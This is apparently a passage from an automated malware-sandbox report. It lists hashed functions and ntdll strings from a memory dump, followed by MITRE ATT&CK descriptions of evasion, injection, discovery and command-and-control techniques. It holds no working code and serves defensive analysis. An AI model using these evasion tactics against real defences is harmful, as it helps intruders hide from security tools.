Instruction Fuzzy Hash: 2390027125140C02D10461A988046860005A7D0341F51C011A6014659ED6A588917271

Uniqueness

Uniqueness Score: -1.00%

Function 012C9730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9521b8e3e20f2104195f8e50809da884753410be66a3c03f6c4274a578b49d78
Instruction ID: 53212ac01846d52ee81f13f33893b83d72937c700bea00bdd182316e28cb8889
Opcode Fuzzy Hash: 9521b8e3e20f2104195f8e50809da884753410be66a3c03f6c4274a578b49d78
Instruction Fuzzy Hash: B290026165540802D14071A994187060015A7D0241F51D011A0014558DC6998A5577E1

Uniqueness

Uniqueness Score: -1.00%

Function 012CA710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abcf9fb55dd17cd0491fbfb7db8cdc809ef008037fcb470b17c9a850f4976293
Instruction ID: d8cb8e86d04f1e32992f29aa55d397d74b76eecad127ce7024f2e0584a3711b1
Opcode Fuzzy Hash: abcf9fb55dd17cd0491fbfb7db8cdc809ef008037fcb470b17c9a850f4976293
Instruction Fuzzy Hash: 1C900271351404529500A6E99804A4A4105A7F0341F51D015A4004558CC59488616261

Uniqueness

Uniqueness Score: -1.00%

Function 012C9760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2ca0d003b5215a11e401575d9eb6271f0deb1dd276191b99c3f9237b03b1315
Instruction ID: be6f9791ffb52cacc61824a8038798e6bc4303167b30951701333001d6877c85
Opcode Fuzzy Hash: f2ca0d003b5215a11e401575d9eb6271f0deb1dd276191b99c3f9237b03b1315
Instruction Fuzzy Hash: FF90027125140803D10061A995087070005A7D0241F51D411A041455CDD69688517261

Uniqueness

Uniqueness Score: -1.00%

Function 012CA770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4f72033daff0f977c8142abb3f4ee881af6888e885c8447ca40681053f7ae8b
Instruction ID: ff0c427a416f9ac47c9764a04d0a47449ea136e0e9e61a004a7e3f6e37414d46
Opcode Fuzzy Hash: d4f72033daff0f977c8142abb3f4ee881af6888e885c8447ca40681053f7ae8b
Instruction Fuzzy Hash: 6290027525544842D50065A99804A870005A7D0345F51D411A041459CDC6948861B261

Uniqueness

Uniqueness Score: -1.00%

Function 012C9770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72058ec4c52c411d97e645355f4e821f1d17d78e3bd8fdcc9391632f9bff041c
Instruction ID: f6098715d06069c5fc7125d322da6a7d44c6efb0d175db1e105c5f1691b432ff
Opcode Fuzzy Hash: 72058ec4c52c411d97e645355f4e821f1d17d78e3bd8fdcc9391632f9bff041c
Instruction Fuzzy Hash: EC90026125544842D10065A99408A060005A7D0245F51D011A1054599DC6758851B271

Uniqueness

Uniqueness Score: -1.00%

Function 012C97A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41c8946f7c81d99af0c789c20141e1bd7d6d85a1a26afff9c0ce16ea271d81d7
Instruction ID: e955b9646012ebd4c09837d10ffe91d086512092e300637d42894f417333cc72
Opcode Fuzzy Hash: 41c8946f7c81d99af0c789c20141e1bd7d6d85a1a26afff9c0ce16ea271d81d7
Instruction Fuzzy Hash: D990026135140403D14071A994186064005F7E1341F51D011E0404558CD95588566362

Uniqueness

Uniqueness Score: -1.00%

Function 012C9610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6af1c45e7961875c2034841e89b20a38f87007f4ada1998c928e9cdfe223357
Instruction ID: 344491cd0b2b861052c73ce21e85643a069590069527b657c98a2b6c13517736
Opcode Fuzzy Hash: f6af1c45e7961875c2034841e89b20a38f87007f4ada1998c928e9cdfe223357
Instruction Fuzzy Hash: ED90027165540C02D15071A984147460005A7D0341F51C011A0014658DC7958A5577E1

Uniqueness

Uniqueness Score: -1.00%

Function 012C9650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4951fcd162abcdb0edac8bb1435fd76753d2d88b7f3896bd6572b590dcabf272
Instruction ID: 3174829ac36984af8e9249633179f11d6c77a655b22a786bb443491d6dde521f
Opcode Fuzzy Hash: 4951fcd162abcdb0edac8bb1435fd76753d2d88b7f3896bd6572b590dcabf272
Instruction Fuzzy Hash: 7290027125544C42D14071A98404A460015A7D0345F51C011A0054698DD6658D55B7A1

Uniqueness

Uniqueness Score: -1.00%

Function 012C96D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38a30e7519fde9fdddf291c98e2875c0d3bf439ee2e951b548898eccc3b081c0
Instruction ID: 1b32433ca45e1dbfdfe0f319138fe5e11de9880b5d4770cef2dad99b45159ec9
Opcode Fuzzy Hash: 38a30e7519fde9fdddf291c98e2875c0d3bf439ee2e951b548898eccc3b081c0
Instruction Fuzzy Hash: 3990027125140C42D10061A98404B460005A7E0341F51C016A0114658DC655C8517661

Uniqueness

Uniqueness Score: -1.00%

Function 012C9950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf98166e937884378df47a92458d9326081ee0bbdcfdedd87a2cf4467b9ee657
Instruction ID: 231cfa5f2ea0d774a8c34a35a1b1725c9e8fd6e5ddb397bf328d0d2c74a34875
Opcode Fuzzy Hash: bf98166e937884378df47a92458d9326081ee0bbdcfdedd87a2cf4467b9ee657
Instruction Fuzzy Hash: 4B9002A125180803D14065A988046070005A7D0342F51C011A2054559ECA698C517275

Uniqueness

Uniqueness Score: -1.00%

Function 012C99D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7020ba64ed8aeed4f51cf9fc03668e93a001c560d2d88aaf0d50ce0fbfe5d25b
Instruction ID: 83af619dee9c4ac3f97fc071eb7d10975580034df67755c7600430ef4941f4b4
Opcode Fuzzy Hash: 7020ba64ed8aeed4f51cf9fc03668e93a001c560d2d88aaf0d50ce0fbfe5d25b
Instruction Fuzzy Hash: 519002A126140442D10461A984047060045A7E1241F51C012A2144558CC5698C616265

Uniqueness

Uniqueness Score: -1.00%

Function 012C9820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f2d28d82a4d7a598ccdc9a8ca97f913371bec6f586b18e1af88f8cb940baf3f
Instruction ID: 1e233c85db04552e87d8dec74f8927420b08b65567dc9e93df9c239e5065546b
Opcode Fuzzy Hash: 7f2d28d82a4d7a598ccdc9a8ca97f913371bec6f586b18e1af88f8cb940baf3f
Instruction Fuzzy Hash: A990027129140802D14171A984046060009B7D0281F91C012A0414558EC6958A56BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012C9840, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f563c4b9d1073169fb0e8de8443d7a252437ec2afbeae0c6882cc4d343fb42b
Instruction ID: d7fefd0f1e8192d07dc1f5a2d62ac8256951d143b6d876adc2a0dc422e1889b2
Opcode Fuzzy Hash: 4f563c4b9d1073169fb0e8de8443d7a252437ec2afbeae0c6882cc4d343fb42b
Instruction Fuzzy Hash: 8F900261292445525545B1A984045074006B7E0281B91C012A1404954CC5669856E761

Uniqueness

Uniqueness Score: -1.00%

Function 012C98A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c503bcfa9c34955731d8a5ae33a9688db7990cb0a803fdf3b74cc32579ebbd5b
Instruction ID: 13792af8f82bc54242f4747396e91ef9be57fcbd3dd8e377326727900e33d348
Opcode Fuzzy Hash: c503bcfa9c34955731d8a5ae33a9688db7990cb0a803fdf3b74cc32579ebbd5b
Instruction Fuzzy Hash: 1A90026135140802D10261A984146060009E7D1385F91C012E1414559DC6658953B272

Uniqueness

Uniqueness Score: -1.00%

Function 012C98F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da710083095bed2924a622d05c2497b0c2c7f528eae15d9a0e97ebf9718b8092
Instruction ID: 584df9a0ef13f39bcecab35aeea11f1343e02f1268ef099275beb08cf1ba8738
Opcode Fuzzy Hash: da710083095bed2924a622d05c2497b0c2c7f528eae15d9a0e97ebf9718b8092
Instruction Fuzzy Hash: 1790026165140902D10171A98404616000AA7D0281F91C022A1014559ECA658992B271

Uniqueness

Uniqueness Score: -1.00%

Function 012C9B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0cf040b3088489ac3ea51105385e6384fbd02a26772aa0e9b812ff8522c72a4
Instruction ID: 6f638d56d4e7860a828bdc787c5732011e53a082d6a65842497fbbb44b05a89d
Opcode Fuzzy Hash: d0cf040b3088489ac3ea51105385e6384fbd02a26772aa0e9b812ff8522c72a4
Instruction Fuzzy Hash: A690026129140C02D14071A9C4147070006E7D0641F51C011A0014558DC656896577F1

Uniqueness

Uniqueness Score: -1.00%

Function 012C9A20, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c460d8a12be1f18d0fb420c8824058eb91b512ef2ae5fbdcb87ffb1d45734452
Instruction ID: 5c36f92e5fd9cf9c0a3365723aa7e82e9fb65ff0b6eab9ff8c892704d61f7300
Opcode Fuzzy Hash: c460d8a12be1f18d0fb420c8824058eb91b512ef2ae5fbdcb87ffb1d45734452
Instruction Fuzzy Hash: 4E90026165140442414071B9C8449064005BBE1251B51C121A0988554DC599886567A5

Uniqueness

Uniqueness Score: -1.00%

Function 012C9A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ce44e49985b8ffe8f66eb89acd28e7f6b5eb0cb10936479eb0eceb3eafcb41
Instruction ID: 5e68f6d94f296e9022873391e764a6fc494572a91ce52fa6ccd14794a3f2f338
Opcode Fuzzy Hash: 32ce44e49985b8ffe8f66eb89acd28e7f6b5eb0cb10936479eb0eceb3eafcb41
Instruction Fuzzy Hash: 7090027125180802D10061A988087470005A7D0342F51C011A5154559EC6A5C8917671

Uniqueness

Uniqueness Score: -1.00%

Function 012C9A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad58fd4fb2999d9528c98f0d2ef5dd8e9d156ba4452f297fe809d6dd2ce4464a
Instruction ID: f365f86541ff89f5aee50ed221fe90b5d9d75f0c232a87d4409aad02ffe452c8
Opcode Fuzzy Hash: ad58fd4fb2999d9528c98f0d2ef5dd8e9d156ba4452f297fe809d6dd2ce4464a
Instruction Fuzzy Hash: 6990026125184842D14062A98804B0F4105A7E1242F91C019A4146558CC95588556761

Uniqueness

Uniqueness Score: -1.00%

Function 012CAD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24d5777ec0b5e45edf5e5fdadafae8247779ff51a41e0b00dd280a5ee71b9303
Instruction ID: 8627166702dc3dd3d1724de8600c28672ddc1b1a35cbb6eb8674d610644b0971
Opcode Fuzzy Hash: 24d5777ec0b5e45edf5e5fdadafae8247779ff51a41e0b00dd280a5ee71b9303
Instruction Fuzzy Hash: 53900271A5540412914071A988146464006B7E0781F55C011A0504558CC9948A5563E1

Uniqueness

Uniqueness Score: -1.00%

Function 012C9FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9300d40ecb3a5ed6280570ddc2318758b17c43b01a7822d5f2e006bee8c3e4d
Instruction ID: 33df53cb24ae2e26f5eb00b63e4e1be4bd8ab477d1958bfb31df04b09f529f67
Opcode Fuzzy Hash: b9300d40ecb3a5ed6280570ddc2318758b17c43b01a7822d5f2e006bee8c3e4d
Instruction Fuzzy Hash: 0E90027136154802D11061A9C4047060005A7D1241F51C411A081455CDC6D588917262

Uniqueness

Uniqueness Score: -1.00%

Function 012C9670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: b267691cc59a7caeb5be127954002eff426d649a4111030828c2bbb7f563d840
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01287CC0, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 198COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01287D51
___swprintf_l.LIBCMT ref: 01287D73
___swprintf_l.LIBCMT ref: 012E2C3D

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 012E2C5E
:%u.%u.%u.%u, xrefs: 012E2D10
::%hs%u.%u.%u.%u, xrefs: 012E2C36
ffff:, xrefs: 012E2C0E, 012E2C35

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 82306e41bc60d60ed12aa1e682870fe11564a43a94d3e2c4c10ad34b524daab5
Instruction ID: cbafa1c3105613f757e52fcac7a00ccb7513c5f6f526e668dabf28268ac6e09a
Opcode Fuzzy Hash: 82306e41bc60d60ed12aa1e682870fe11564a43a94d3e2c4c10ad34b524daab5
Instruction Fuzzy Hash: CE61E7B2A21157ABCB10EF9CC88097EF7F8FF582007648169E995D7681E774DE50C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 012840FD, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 195COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 012E057D
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 012E058F
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 012E0566
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 012E04BF
ExecuteOptions, xrefs: 012E050A
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 012E05AC
CLIENT(ntdll): Processing section info %ws..., xrefs: 012E05F1

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 65f7df0d9c81d76ada2d6ef128660d252fc09aeda10d85ace5fc140291aaafc6
Instruction ID: 02f69b33302054d981e3c0297bccde620f120cf440457f82098eabe1e756ba0e
Opcode Fuzzy Hash: 65f7df0d9c81d76ada2d6ef128660d252fc09aeda10d85ace5fc140291aaafc6
Instruction Fuzzy Hash: 62615A3172124BBBEF21FA95DC46FB977ACEF68304F040099E605A71C0D6B09E418B64

Uniqueness

Uniqueness Score: -1.00%

Function 012877A0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E2953

Strings

RTL: Resource at %p, xrefs: 012E296B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 012E295B
RTL: Re-Waiting, xrefs: 012E2988

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 9651978e062dd030dd3af97bb836f2c9b80ab5c2f39687d062c686cc52f33a2b
Instruction ID: f51dc1398b563750d7cba673c90c037f9f9206726fc3c20df1f75296d7265538
Opcode Fuzzy Hash: 9651978e062dd030dd3af97bb836f2c9b80ab5c2f39687d062c686cc52f33a2b
Instruction Fuzzy Hash: 00318E31A20636EBDB259A16CC85F277BACEF52B64F600208EE5557181C721BC11C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 012C1CC7, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 193COMMON

Download Yara Rule

Strings

@, xrefs: 012C1D1B
$, xrefs: 012C1D37

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 404dd39ffa9191f7e4776bc6428b65df0e8c35cb35a9917c2fd2732992dcaae3
Instruction ID: f94b185760557dfbb1597f8eb71a03cb76acb79b539b379053e066cfac77b305
Opcode Fuzzy Hash: 404dd39ffa9191f7e4776bc6428b65df0e8c35cb35a9917c2fd2732992dcaae3
Instruction Fuzzy Hash: 03811A71D1026EDBDB359F94CC45BEEBAB8AF09714F0041EAAA09B7240D7705E85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0131FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0131FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0131FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0131FE2B

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 9da8ff3b2fdf8aa3bddc0b1950bdf03ea32ec7ca1b692844bec3abefb1a983b0
Instruction ID: 09486008edb635864cb7e59d38473853fa15bea500ad8daadcd2bbb6d9c8f124
Opcode Fuzzy Hash: 9da8ff3b2fdf8aa3bddc0b1950bdf03ea32ec7ca1b692844bec3abefb1a983b0
Instruction Fuzzy Hash: A2F0C232200201BBE6251A49DC02F23BF5AEB85B30F140318F628565D1EA62E86096F0

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
